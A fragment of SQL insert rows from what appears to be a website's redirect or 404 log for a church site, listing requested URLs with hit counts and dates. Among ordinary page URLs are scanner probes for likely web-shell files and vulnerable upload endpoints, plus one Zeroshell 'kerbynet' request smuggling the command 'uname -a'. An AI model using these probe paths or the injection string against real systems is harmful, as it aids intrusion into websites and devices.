(3769, 'http://www.lifeoasisinternationalchurch.org/131-2014-2', NULL, '', '', 1, 0, '2017-02-19 04:01:34', '0000-00-00 00:00:00', 301),
(3770, 'http://lifeoasisinternationalchurch.org/PhotoGallery/contact.html', NULL, '', '', 1, 0, '2017-02-19 07:15:23', '0000-00-00 00:00:00', 301),
(3771, 'http://www.lifeoasisinternationalchurch.org/component', NULL, '', '', 9, 0, '2017-02-19 11:38:52', '0000-00-00 00:00:00', 301),
(3772, 'http://www.lifeoasisinternationalchurch.org/component/k2', NULL, '', '', 9, 0, '2017-02-19 11:38:53', '0000-00-00 00:00:00', 301),
(3773, 'http://lifeoasisinternationalchurch.org/prayer/137-2014-8', NULL, '', '', 1, 0, '2017-02-19 14:24:25', '0000-00-00 00:00:00', 301),
(3774, 'http://lifeoasisinternationalchurch.org/index.php/template-info/ljmti', NULL, '', '', 17, 0, '2017-02-19 20:53:59', '0000-00-00 00:00:00', 301),
(3775, 'http://lifeoasisinternationalchurch.org/prayer/135-2014-6', NULL, '', '', 1, 0, '2017-02-19 21:17:29', '0000-00-00 00:00:00', 301),
(3776, 'http://www.lifeoasisinternationalchurch.org/index.php/145-day-19', NULL, '', '', 5, 0, '2017-02-19 21:57:04', '0000-00-00 00:00:00', 301),
(3777, 'http://www.lifeoasisinternationalchurch.org/home/index.php/index.php/contact-us', NULL, '', '', 1, 0, '2017-02-19 22:58:17', '0000-00-00 00:00:00', 301),
(3778, 'http://www.lifeoasisinternationalchurch.org/index.php/141-day-15', NULL, '', '', 6, 0, '2017-02-20 01:07:52', '0000-00-00 00:00:00', 301),
(3779, 'http://www.lifeoasisinternationalchurch.org/home/index.php/index.php/vision', NULL, '', '', 1, 0, '2017-02-20 01:24:00', '0000-00-00 00:00:00', 301),
(3780, 'http://www.lifeoasisinternationalchurch.org/daughtersofdestiny/', NULL, '', '', 1, 0, '2017-02-20 01:27:53', '0000-00-00 00:00:00', 301),
(3781, 'http://www.lifeoasisinternationalchurch.org/81-day-29', NULL, '', '', 1, 0, '2017-02-20 01:54:20', '0000-00-00 00:00:00', 301),
(3782, 'http://lifeoasisinternationalchurch.org/streaming;', NULL, '', '', 3, 0, '2017-02-20 05:19:52', '0000-00-00 00:00:00', 301),
(3783, 'https://www.spiritmeat.net/mp3-messages/speaker/2/sermons?limitstart=0', NULL, '', '', 1, 0, '2017-02-20 08:11:14', '0000-00-00 00:00:00', 301),
(3784, 'http://lifeoasisinternationalchurch.org/index.php/12-sample-content/19-sample-content-8', NULL, '', '', 1, 0, '2017-02-20 08:28:39', '0000-00-00 00:00:00', 301),
(3785, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/19-prayer-a-fasting-day-10', NULL, '', '', 1, 0, '2017-02-20 08:46:34', '0000-00-00 00:00:00', 301),
(3786, 'http://lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/19-sample-content-8', NULL, '', '', 1, 0, '2017-02-20 09:40:53', '0000-00-00 00:00:00', 301),
(3787, 'http://lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/11', NULL, '', '', 1, 0, '2017-02-20 09:47:12', '0000-00-00 00:00:00', 301),
(3788, 'http://lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/19-prayer-a-fasting-day-10', NULL, '', '', 2, 0, '2017-02-20 10:33:57', '0000-00-00 00:00:00', 301),
(3789, 'http://lifeoasisinternationalchurch.org/resources/sermon-not', NULL, '', '', 2, 0, '2017-02-20 13:43:17', '0000-00-00 00:00:00', 301),
(3790, 'http://lifeoasisinternationalchurch.org/resources/sermon-no', NULL, '', '', 2, 0, '2017-02-20 13:43:18', '0000-00-00 00:00:00', 301),
(3791, 'http://lifeoasisinternationalchurch.org/resources/sermon-n', NULL, '', '', 2, 0, '2017-02-20 13:43:18', '0000-00-00 00:00:00', 301),
(3792, 'http://lifeoasisinternationalchurch.org/resources/sermon-note', NULL, '', '', 3, 0, '2017-02-20 13:43:19', '0000-00-00 00:00:00', 301),
(3793, 'http://lifeoasisinternationalchurch.org/resources/s', NULL, '', '', 1, 0, '2017-02-20 13:43:19', '0000-00-00 00:00:00', 301),
(3794, 'http://lifeoasisinternationalchurch.org/resources/serm', NULL, '', '', 2, 0, '2017-02-20 13:43:19', '0000-00-00 00:00:00', 301),
(3795, 'http://lifeoasisinternationalchurch.org/resources/ser', NULL, '', '', 2, 0, '2017-02-20 13:43:20', '0000-00-00 00:00:00', 301),
(3796, 'http://lifeoasisinternationalchurch.org/resources/se', NULL, '', '', 2, 0, '2017-02-20 13:43:20', '0000-00-00 00:00:00', 301),
(3797, 'http://lifeoasisinternationalchurch.org/resources/sermon-', NULL, '', '', 2, 0, '2017-02-20 13:43:20', '0000-00-00 00:00:00', 301),
(3798, 'http://lifeoasisinternationalchurch.org/resources/sermo', NULL, '', '', 2, 0, '2017-02-20 13:43:23', '0000-00-00 00:00:00', 301),
(3799, 'http://lifeoasisinternationalchurch.org/resources/sermon', NULL, '', '', 2, 0, '2017-02-20 13:43:23', '0000-00-00 00:00:00', 301),
(3800, 'http://lifeoasisinternationalchurch.org/resources/iradio', NULL, '', '', 2, 0, '2017-02-20 14:46:07', '0000-00-00 00:00:00', 301),
(3801, 'http://www.lifeoasisinternationalchurch.org/57-prophetic-words-for-day-5', NULL, '', '', 1, 0, '2017-02-20 16:33:06', '0000-00-00 00:00:00', 301),
(3802, 'http://lifeoasisinternationalchurch.org/index.php/tutorials/rev-mrs-oyenike-areogun', NULL, '', '', 1, 0, '2017-02-20 17:45:31', '0000-00-00 00:00:00', 301),
(3803, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/14-sample-content-3', NULL, '', '', 2, 0, '2017-02-20 18:41:54', '0000-00-00 00:00:00', 301),
(3804, 'http://lifeoasisinternationalchurch.org/resources/blog/item/2', NULL, '', '', 3, 0, '2017-02-20 18:53:01', '0000-00-00 00:00:00', 301),
(3805, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/55-prayer-a-fasting-day-6', NULL, '', '', 3, 0, '2017-02-20 20:25:52', '0000-00-00 00:00:00', 301),
(3806, 'http://lifeoasisinternationalchurch.org//web/download_file.php', NULL, '', '', 4, 0, '2017-02-21 01:25:42', '0000-00-00 00:00:00', 301),
(3807, 'http://www.lifeoasisinternationalchurch.org/index.php/2012-03-03-17-39-27', NULL, '', '', 2, 0, '2017-02-21 03:34:26', '0000-00-00 00:00:00', 301),
(3808, 'http://lifeoasisinternationalchurch.org/hfilter.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-02-21 09:37:47', '0000-00-00 00:00:00', 301),
(3809, 'http://lifeoasisinternationalchurch.org/hook-filters.php', NULL, 'lifeoasisinternationalchurch.org', '', 3, 0, '2017-02-21 09:42:33', '0000-00-00 00:00:00', 301),
(3810, 'http://www.lifeoasisinternationalchurch.org/index.php/148-day-21', NULL, '', '', 6, 0, '2017-02-21 11:35:19', '0000-00-00 00:00:00', 301),
(3811, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_myblog&task=ajaxupload', NULL, '', '', 4, 0, '2017-02-21 13:53:19', '0000-00-00 00:00:00', 301),
(3812, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_adsmanager&task=upload&tmpl=component', NULL, '', '', 3, 0, '2017-02-21 13:53:20', '0000-00-00 00:00:00', 301),
(3813, 'http://lifeoasisinternationalchurch.org/logs/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/logs/logo_img.php', '', 3, 0, '2017-02-21 17:14:26', '0000-00-00 00:00:00', 301),
(3814, 'http://lifeoasisinternationalchurch.org/live stream', NULL, '', '', 1, 0, '2017-02-21 17:28:01', '0000-00-00 00:00:00', 301),
(3815, 'http://www.lifeoasisinternationalchurch.org/private-strea', NULL, '', '', 3, 0, '2017-02-21 22:08:34', '0000-00-00 00:00:00', 301),
(3816, 'http://www.lifeoasisinternationalchurch.org/private-stream', NULL, '', '', 5, 0, '2017-02-21 22:08:35', '0000-00-00 00:00:00', 301),
(3817, 'http://www.lifeoasisinternationalchurch.org/private-st', NULL, '', '', 3, 0, '2017-02-21 22:08:42', '0000-00-00 00:00:00', 301),
(3818, 'http://www.lifeoasisinternationalchurch.org/private', NULL, '', '', 6, 0, '2017-02-21 22:08:44', '0000-00-00 00:00:00', 301),
(3819, 'http://www.lifeoasisinternationalchurch.org/private-streami', NULL, '', '', 3, 0, '2017-02-21 22:08:45', '0000-00-00 00:00:00', 301),
(3820, 'http://www.lifeoasisinternationalchurch.org/private-streamin', NULL, '', '', 3, 0, '2017-02-21 22:08:50', '0000-00-00 00:00:00', 301),
(3821, 'http://www.lifeoasisinternationalchurch.org/private-', NULL, '', '', 3, 0, '2017-02-21 22:08:52', '0000-00-00 00:00:00', 301),
(3822, 'http://www.lifeoasisinternationalchurch.org/privat', NULL, '', '', 7, 0, '2017-02-21 22:08:52', '0000-00-00 00:00:00', 301),
(3823, 'http://lifeoasisinternationalchurch.org/component/content/category/12-sample-content', NULL, '', '', 1, 0, '2017-02-22 04:36:31', '0000-00-00 00:00:00', 301),
(3824, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/14', NULL, '', '', 4, 0, '2017-02-22 07:21:20', '0000-00-00 00:00:00', 301),
(3825, 'https://www.spiritmeat.net/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-02-22 08:14:04', '0000-00-00 00:00:00', 301),
(3826, 'https://www.spiritmeat.net/component/content/article/12-sample-content/19-sample-content-8?tmpl=component&print=1&page=', NULL, '', '', 1, 0, '2017-02-22 08:14:06', '0000-00-00 00:00:00', 301),
(3827, 'https://www.spiritmeat.net/component/content/article/2-uncategorised/47-videos', NULL, '', '', 1, 0, '2017-02-22 08:14:11', '0000-00-00 00:00:00', 301),
(3828, 'https://www.spiritmeat.net/component/content/category/12-sample-content', NULL, '', '', 3, 0, '2017-02-22 08:14:16', '0000-00-00 00:00:00', 301),
(3829, 'https://www.spiritmeat.net/component/content/category/16-fp-tabs', NULL, '', '', 3, 0, '2017-02-22 08:14:18', '0000-00-00 00:00:00', 301),
(3830, 'http://www.lifeoasisinternationalchurch.org/index.php/component/content/category/11-demo-articles', NULL, '', '', 1, 0, '2017-02-22 11:46:04', '0000-00-00 00:00:00', 301),
(3831, 'http://lifeoasisinternationalchurch.org/download/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/download/logo_img.php', '', 1, 0, '2017-02-22 18:20:01', '0000-00-00 00:00:00', 301),
(3832, 'https://www.spiritmeat.net/videos/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-02-23 06:05:08', '0000-00-00 00:00:00', 301),
(3833, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/16-prayer-a-fasting-day-7', NULL, '', '', 1, 0, '2017-02-23 10:50:19', '0000-00-00 00:00:00', 301),
(3834, 'http://lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/sermons', NULL, '', '', 1, 0, '2017-02-23 13:47:18', '0000-00-00 00:00:00', 301),
(3835, 'http://lifeoasisinternationalchurch.org/component/jcomments/captcha/80776', NULL, '', '', 1, 0, '2017-02-23 14:44:12', '0000-00-00 00:00:00', 301),
(3836, 'http://www.lifeoasisinternationalchurch.org/log.php', NULL, 'http://www.lifeoasisinternationalchurch.org/log.php', '', 1, 0, '2017-02-23 17:32:24', '0000-00-00 00:00:00', 301),
(3837, 'http://lifeoasisinternationalchurch.org/log.php', NULL, 'http://lifeoasisinternationalchurch.org/log.php', '', 1, 0, '2017-02-23 20:29:05', '0000-00-00 00:00:00', 301),
(3838, 'http://lifeoasisinternationalchurch.org/template-info/mimmp/18-loic/50-young-achievers?page&print=1&tmpl=component', NULL, '', '', 1, 0, '2017-02-24 00:46:13', '0000-00-00 00:00:00', 301),
(3839, 'http://lifeoasisinternationalchurch.org/destinyinternationalcollege/boarding-requirements', NULL, '', '', 1, 0, '2017-02-24 00:49:43', '0000-00-00 00:00:00', 301),
(3840, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/36139', NULL, '', '', 1, 0, '2017-02-24 17:34:21', '0000-00-00 00:00:00', 301),
(3841, 'http://www.lifeoasisinternationalchurch.org/174-focus40-3', NULL, '', '', 1, 0, '2017-02-24 22:45:19', '0000-00-00 00:00:00', 301),
(3842, 'http://www.lifeoasisinternationalchurch.org/news.php', NULL, 'http://www.lifeoasisinternationalchurch.org/news.php', '', 1, 0, '2017-02-24 23:45:45', '0000-00-00 00:00:00', 301),
(3843, 'http://lifeoasisinternationalchurch.org/resources/2013-gobc-online-registration', NULL, '', '', 24, 0, '2017-02-25 05:02:09', '0000-00-00 00:00:00', 301),
(3844, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/20', NULL, '', '', 4, 0, '2017-02-25 06:30:40', '0000-00-00 00:00:00', 301),
(3845, 'http://lifeoasisinternationalchurch.org/news.php', NULL, 'http://lifeoasisinternationalchurch.org/news.php', '', 2, 0, '2017-02-25 07:35:37', '0000-00-00 00:00:00', 301),
(3846, 'http://www.lifeoasisinternationalchurch.org/adri23.php', NULL, 'http://www.lifeoasisinternationalchurch.org/adri23.php', '', 1, 0, '2017-02-25 07:53:50', '0000-00-00 00:00:00', 301),
(3847, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/17-prayer-a-fasting-day-8', NULL, '', '', 1, 0, '2017-02-25 10:57:42', '0000-00-00 00:00:00', 301),
(3848, 'http://www.lifeoasisinternationalchurch.org/158-focus32-5', NULL, '', '', 1, 0, '2017-02-25 13:25:39', '0000-00-00 00:00:00', 301),
(3849, 'http://lifeoasisinternationalchurch.org/adri23.php', NULL, 'http://lifeoasisinternationalchurch.org/adri23.php', '', 1, 0, '2017-02-25 13:47:34', '0000-00-00 00:00:00', 301),
(3850, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/15-prayer-a-fasting-day-6', NULL, '', '', 3, 0, '2017-02-25 15:03:27', '0000-00-00 00:00:00', 301),
(3851, 'http://www.lifeoasisinternationalchurch.org/index.php/150-day-23', NULL, '', '', 5, 0, '2017-02-25 15:04:00', '0000-00-00 00:00:00', 301),
(3852, 'http://www.lifeoasisinternationalchurch.org/index.php/153-day-26', NULL, '', '', 6, 0, '2017-02-25 15:04:00', '0000-00-00 00:00:00', 301),
(3853, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/44-prayer-a-fasting-day-35', NULL, '', '', 2, 0, '2017-02-25 15:04:59', '0000-00-00 00:00:00', 301),
(3854, 'http://lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/15-sample-content-4', NULL, '', '', 1, 0, '2017-02-25 15:26:58', '0000-00-00 00:00:00', 301),
(3855, 'http://lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/15-prayer-a-fasting-day-6', NULL, '', '', 1, 0, '2017-02-25 16:21:54', '0000-00-00 00:00:00', 301),
(3856, 'http://www.lifeoasisinternationalchurch.org/126-prayer-focus-for-day-37', NULL, '', '', 2, 0, '2017-02-25 19:42:34', '0000-00-00 00:00:00', 301),
(3857, 'http://lifeoasisinternationalchurch.org/sf', NULL, '', '', 1, 0, '2017-02-25 21:12:06', '0000-00-00 00:00:00', 301),
(3858, 'http://www.lifeoasisinternationalchurch.org/_input_3_up.php', NULL, 'http://www.lifeoasisinternationalchurch.org/_input_3_up.php', '', 1, 0, '2017-02-25 21:40:26', '0000-00-00 00:00:00', 301),
(3859, 'http://www.lifeoasisinternationalchurch.org/xGSx.php', NULL, 'http://www.lifeoasisinternationalchurch.org/xGSx.php', '', 1, 0, '2017-02-25 22:23:55', '0000-00-00 00:00:00', 301),
(3860, 'http://www.lifeoasisinternationalchurch.org/index.php/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-02-26 03:14:37', '0000-00-00 00:00:00', 301),
(3861, 'http://lifeoasisinternationalchurch.org/_input_3_up.php', NULL, 'http://lifeoasisinternationalchurch.org/_input_3_up.php', '', 1, 0, '2017-02-26 05:08:53', '0000-00-00 00:00:00', 301),
(3862, 'http://lifeoasisinternationalchurch.org/xGSx.php', NULL, 'http://lifeoasisinternationalchurch.org/xGSx.php', '', 1, 0, '2017-02-26 06:14:23', '0000-00-00 00:00:00', 301),
(3863, 'http://lifeoasisinternationalchurch.org/live streaming', NULL, '', '', 3, 0, '2017-02-26 06:34:23', '0000-00-00 00:00:00', 301),
(3864, 'http://lifeoasisinternationalchurch.org/streaming of our services on sunday//', NULL, '', '', 2, 0, '2017-02-26 07:43:10', '0000-00-00 00:00:00', 301),
(3865, 'http://lifeoasisinternationalchurch.org/steaming', NULL, '', '', 202, 0, '2017-02-26 09:54:58', '0000-00-00 00:00:00', 301),
(3866, 'http://www.lifeoasisinternationalchurch.org/ws.php', NULL, 'http://www.lifeoasisinternationalchurch.org/ws.php', '', 1, 0, '2017-02-26 18:24:07', '0000-00-00 00:00:00', 301),
(3867, 'http://www.lifeoasisinternationalchurch.org/loic/events.php', NULL, '', '', 14, 0, '2017-02-26 18:51:19', '0000-00-00 00:00:00', 301),
(3868, 'http://lifeoasisinternationalchurch.org/vmskdl44rededd', NULL, '', '', 8, 0, '2017-02-26 18:54:06', '0000-00-00 00:00:00', 301),
(3869, 'http://lifeoasisinternationalchurch.org/N0Wccvvd333.php', NULL, '', '', 8, 0, '2017-02-26 18:54:07', '0000-00-00 00:00:00', 301),
(3870, 'http://lifeoasisinternationalchurch.org/N0WaY/N0WaY1bb2/N0WaY123.php', NULL, '', '', 8, 0, '2017-02-26 18:54:08', '0000-00-00 00:00:00', 301),
(3871, 'http://lifeoasisinternationalchurch.org/user', NULL, '', '', 6, 0, '2017-02-26 18:54:11', '0000-00-00 00:00:00', 301),
(3872, 'http://lifeoasisinternationalchurch.org/sites/default/settings', NULL, '', '', 4, 0, '2017-02-26 18:54:11', '0000-00-00 00:00:00', 301),
(3873, 'http://lifeoasisinternationalchurch.org/sites/lifeoasisinternationalchurch.org/settings', NULL, '', '', 4, 0, '2017-02-26 18:54:12', '0000-00-00 00:00:00', 301),
(3874, 'http://www.lifeoasisinternationalchurch.org/template-info-2/rev-oyenike-areogun/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-02-26 19:11:17', '0000-00-00 00:00:00', 301),
(3875, 'http://www.lifeoasisinternationalchurch.org/loic/conventions.php', NULL, '', '', 7, 0, '2017-02-26 19:13:41', '0000-00-00 00:00:00', 301),
(3876, 'http://www.lifeoasisinternationalchurch.org/loic/testimonies.php', NULL, '', '', 12, 0, '2017-02-26 22:03:57', '0000-00-00 00:00:00', 301),
(3877, 'http://www.lifeoasisinternationalchurch.org/loic/aboutus.php', NULL, '', '', 49, 0, '2017-02-26 22:06:56', '0000-00-00 00:00:00', 301),
(3878, 'http://www.lifeoasisinternationalchurch.org/loic/gobc.php', NULL, '', '', 29, 0, '2017-02-26 22:09:50', '0000-00-00 00:00:00', 301),
(3879, 'http://www.lifeoasisinternationalchurch.org/loic/programmes.php', NULL, '', '', 13, 0, '2017-02-26 23:33:05', '0000-00-00 00:00:00', 301),
(3880, 'https://142.4.21.132/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=\"&uname -a&\"', NULL, '', '', 1, 0, '2017-02-27 01:49:11', '0000-00-00 00:00:00', 301),
(3881, 'http://lifeoasisinternationalchurch.org/ws.php', NULL, 'http://lifeoasisinternationalchurch.org/ws.php', '', 1, 0, '2017-02-27 02:55:08', '0000-00-00 00:00:00', 301),
(3882, 'http://www.lifeoasisinternationalchurch.org/146-day222014', NULL, '', '', 1, 0, '2017-02-27 08:07:23', '0000-00-00 00:00:00', 301),
(3883, 'http://www.lifeoasisinternationalchurch.org/loic/mediaoutreach.php', NULL, '', '', 56, 0, '2017-02-27 08:16:17', '0000-00-00 00:00:00', 301),
(3884, 'http://lifeoasisinternationalchurch.org/index.php/127-prayer-focus-for-day-5', NULL, '', '', 1, 0, '2017-02-27 08:51:12', '0000-00-00 00:00:00', 301),
(3885, 'http://www.lifeoasisinternationalchurch.org/loic/gallery.php', NULL, '', '', 11, 0, '2017-02-27 09:51:36', '0000-00-00 00:00:00', 301),
(3886, 'http://lifeoasisinternationalchurch.org/dreamcentre.php', NULL, '', '', 1, 0, '2017-02-27 14:33:53', '0000-00-00 00:00:00', 301),
(3887, 'http://www.lifeoasisinternationalchurch.org/template-info/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&Itemid=189', NULL, '', '', 2, 0, '2017-02-27 14:49:31', '0000-00-00 00:00:00', 301),
(3888, 'http://www.lifeoasisinternationalchurch.org/loic/revolusola.php', NULL, '', '', 46, 0, '2017-02-27 15:37:35', '0000-00-00 00:00:00', 301),
(3889, 'http://www.lifeoasisinternationalchurch.org/test/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/test/logo_img.php', '', 1, 0, '2017-02-27 18:38:59', '0000-00-00 00:00:00', 301),
(3890, 'http://lifeoasisinternationalchurch.org/loic/sermons.php', NULL, '', '', 44, 0, '2017-02-27 22:00:07', '0000-00-00 00:00:00', 301),
(3891, 'http://www.lifeoasisinternationalchurch.org/loic/churchlocations.php', NULL, '', '', 79, 0, '2017-02-28 01:21:30', '0000-00-00 00:00:00', 301),
(3892, 'http://lifeoasisinternationalchurch.org/loic/ljmt.php', NULL, '', '', 8, 0, '2017-02-28 01:31:38', '0000-00-00 00:00:00', 301),
(3893, 'http://lifeoasisinternationalchurch.org/test/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/test/logo_img.php', '', 1, 0, '2017-02-28 03:09:09', '0000-00-00 00:00:00', 301),
(3894, 'http://www.lifeoasisinternationalchurch.org/loic/globalintercessorynetwork.php', NULL, '', '', 61, 0, '2017-02-28 05:31:16', '0000-00-00 00:00:00', 301),
(3895, 'http://lifeoasisinternationalchurch.org/loic/revolusola.php', NULL, '', '', 69, 0, '2017-02-28 07:31:32', '0000-00-00 00:00:00', 301),
(3896, 'http://lifeoasisinternationalchurch.org/loic/gallery.php', NULL, '', '', 2, 0, '2017-02-28 07:38:12', '0000-00-00 00:00:00', 301),
(3897, 'http://lifeoasisinternationalchurch.org/index.php/226-2016-day-9', NULL, '', '', 1, 0, '2017-02-28 09:40:45', '0000-00-00 00:00:00', 301),
(3898, 'http://www.lifeoasisinternationalchurch.org/index.php/178-2015-day-2', NULL, '', '', 6, 0, '2017-02-28 10:04:50', '0000-00-00 00:00:00', 301),
(3899, 'http://lifeoasisinternationalchurch.org/index.php/232-2016-day-15', NULL, '', '', 1, 0, '2017-02-28 10:10:45', '0000-00-00 00:00:00', 301),
(3900, 'http://lifeoasisinternationalchurch.org/hidden-stream/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-02-28 10:15:28', '0000-00-00 00:00:00', 301),
(3901, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/49-prayer-a-fasting-day-38', NULL, '', '', 11, 0, '2017-02-28 10:15:29', '0000-00-00 00:00:00', 301),
(3902, 'http://lifeoasisinternationalchurch.org/index.php/234-2016-day-17', NULL, '', '', 1, 0, '2017-02-28 10:32:22', '0000-00-00 00:00:00', 301),
(3903, 'http://lifeoasisinternationalchurch.org/loic/', NULL, '', '', 1, 0, '2017-02-28 13:41:15', '0000-00-00 00:00:00', 301),
(3904, 'http://www.lifeoasisinternationalchurch.org/resources/zion-pillar/2-uncategorised', NULL, '', '', 3, 0, '2017-02-28 15:26:36', '0000-00-00 00:00:00', 301),
(3905, 'http://www.lifeoasisinternationalchurch.org/loic/sermons.php', NULL, '', '', 63, 0, '2017-02-28 18:45:56', '0000-00-00 00:00:00', 301),
(3906, 'http://lifeoasisinternationalchurch.org/our-gallery', NULL, '', '', 1, 0, '2017-02-28 20:37:12', '0000-00-00 00:00:00', 301),
(3907, 'http://www.lifeoasisinternationalchurch.org/spiritmeat', NULL, '', '', 2, 0, '2017-02-28 21:46:38', '0000-00-00 00:00:00', 301),
(3908, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/41-prayer-a-fasting-day-30', NULL, '', '', 2, 0, '2017-02-28 23:32:41', '0000-00-00 00:00:00', 301),
(3909, 'http://www.lifeoasisinternationalchurch.org/loic/newsletter.php', NULL, '', '', 11, 0, '2017-02-28 23:41:43', '0000-00-00 00:00:00', 301),
(3910, 'http://www.lifeoasisinternationalchurch.org/loic/onlinecommunities.php', NULL, '', '', 11, 0, '2017-03-01 10:38:18', '0000-00-00 00:00:00', 301),
(3911, 'http://www.lifeoasisinternationalchurch.org/mobile/resources/blog/item/12-business', NULL, '', '', 1, 0, '2017-03-01 14:06:56', '0000-00-00 00:00:00', 301),
(3912, 'http://lifeoasisinternationalchurch.org/media/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/media/logo_img.php', '', 2, 0, '2017-03-01 15:52:29', '0000-00-00 00:00:00', 301),
(3913, 'http://lifeoasisinternationalchurch.org/stream', NULL, '', '', 3, 0, '2017-03-01 16:05:31', '0000-00-00 00:00:00', 301),
(3914, 'http://lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/7-tutorials-and-guides', NULL, '', '', 1, 0, '2017-03-01 17:04:22', '0000-00-00 00:00:00', 301),
(3915, 'http://lifeoasisinternationalchurch.org/loicforum', NULL, '', '', 2, 0, '2017-03-01 22:15:22', '0000-00-00 00:00:00', 301),
(3916, 'http://www.lifeoasisinternationalchurch.org/l', NULL, '', '', 2, 0, '2017-03-02 06:05:37', '0000-00-00 00:00:00', 301),
(3917, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/07/15', NULL, '', '', 2, 0, '2017-03-02 06:49:47', '0000-00-00 00:00:00', 301),
(3918, 'http://www.lifeoasisinternationalchurch.org/loic/thronemusic.php', NULL, '', '', 33, 0, '2017-03-02 06:52:07', '0000-00-00 00:00:00', 301),
(3919, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/17-sample-content-6', NULL, '', '', 2, 0, '2017-03-02 06:52:07', '0000-00-00 00:00:00', 301),
(3920, 'http://www.lifeoasisinternationalchurch.org/loic/kingdombuilders.php', NULL, '', '', 57, 0, '2017-03-02 12:49:54', '0000-00-00 00:00:00', 301),
(3921, 'http://lifeoasisinternationalchurch.org/wp-copv/hook-filters.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-03-02 15:29:53', '0000-00-00 00:00:00', 301),
(3922, 'http://lifeoasisinternationalchurch.org/wp-logs.php?action=test', NULL, '', '', 1, 0, '2017-03-02 16:42:51', '0000-00-00 00:00:00', 301),
(3923, 'http://www.lifeoasisinternationalchurch.org/loic/', NULL, '', '', 1, 0, '2017-03-02 18:26:22', '0000-00-00 00:00:00', 301),
(3924, 'http://www.lifeoasisinternationalchurch.org/loic/revoyenike.php', NULL, '', '', 31, 0, '2017-03-02 19:49:52', '0000-00-00 00:00:00', 301),
(3925, 'http://www.lifeoasisinternationalchurch.org/administrator/layouts/modules.php', NULL, 'http://www.lifeoasisinternationalchurch.org/administrator/layouts/modules.php', '', 2, 0, '2017-03-02 19:50:59', '0000-00-00 00:00:00', 301),
(3926, 'http://lifeoasisinternationalchurch.org/administrator/layouts/modules.php', NULL, 'http://lifeoasisinternationalchurch.org/administrator/layouts/modules.php', '', 1, 0, '2017-03-03 03:50:38', '0000-00-00 00:00:00', 301),
(3927, 'http://www.lifeoasisinternationalchurch.org/resources/kindom-builder/16-divine-instructions', NULL, '', '', 1, 0, '2017-03-03 04:18:54', '0000-00-00 00:00:00', 301),
(3928, 'http://lifeoasisinternationalchurch.org/resources/zion-pillar', NULL, '', '', 1, 0, '2017-03-03 05:05:04', '0000-00-00 00:00:00', 301),
(3929, 'http://lifeoasisinternationalchurch.org/music.lifeoasisinternationalchurch.org/', NULL, '', '', 2, 0, '2017-03-03 05:45:37', '0000-00-00 00:00:00', 301),
(3930, 'http://www.lifeoasisinternationalchurch.org/index.php/185-2015-day-9', NULL, 'http://www.lifeoasisinternationalchurch.org/prayer/index.php/217-2015-day-40', '', 5, 0, '2017-03-03 06:43:45', '0000-00-00 00:00:00', 301),
(3931, 'http://www.lifeoasisinternationalchurch.org/loic/dailyreading.php', NULL, '', '', 19, 0, '2017-03-03 08:58:27', '0000-00-00 00:00:00', 301),
(3932, 'http://lifeoasisinternationalchurch.org/info/info.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-03-03 09:40:51', '0000-00-00 00:00:00', 301),
(3933, 'http://lifeoasisinternationalchurch.org/backups.php?mode=config&key=C6y1F2EA7217PBTL1FlcH98sOpfo/r1Z76/OKFae', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-03-03 10:08:57', '0000-00-00 00:00:00', 301),
(3934, 'http://www.lifeoasisinternationalchurch.org/loic/onlinebible.php', NULL, '', '', 8, 0, '2017-03-03 11:47:03', '0000-00-00 00:00:00', 301),
(3935, 'http://lifeoasisinternationalchurch.org/prayer/64-day-12', NULL, '', '', 1, 0, '2017-03-03 12:02:25', '0000-00-00 00:00:00', 301),
(3936, 'http://lifeoasisinternationalchurch.org/loic/churchlocations.php', NULL, '', '', 13, 0, '2017-03-03 14:56:12', '0000-00-00 00:00:00', 301),
(3937, 'http://www.lifeoasisinternationalchurch.org/loic/articles.php', NULL, '', '', 26, 0, '2017-03-03 20:06:21', '0000-00-00 00:00:00', 301),
(3938, 'http://www.lifeoasisinternationalchurch.org/loic/abundantlifehouse.php', NULL, '', '', 6, 0, '2017-03-03 20:07:51', '0000-00-00 00:00:00', 301),
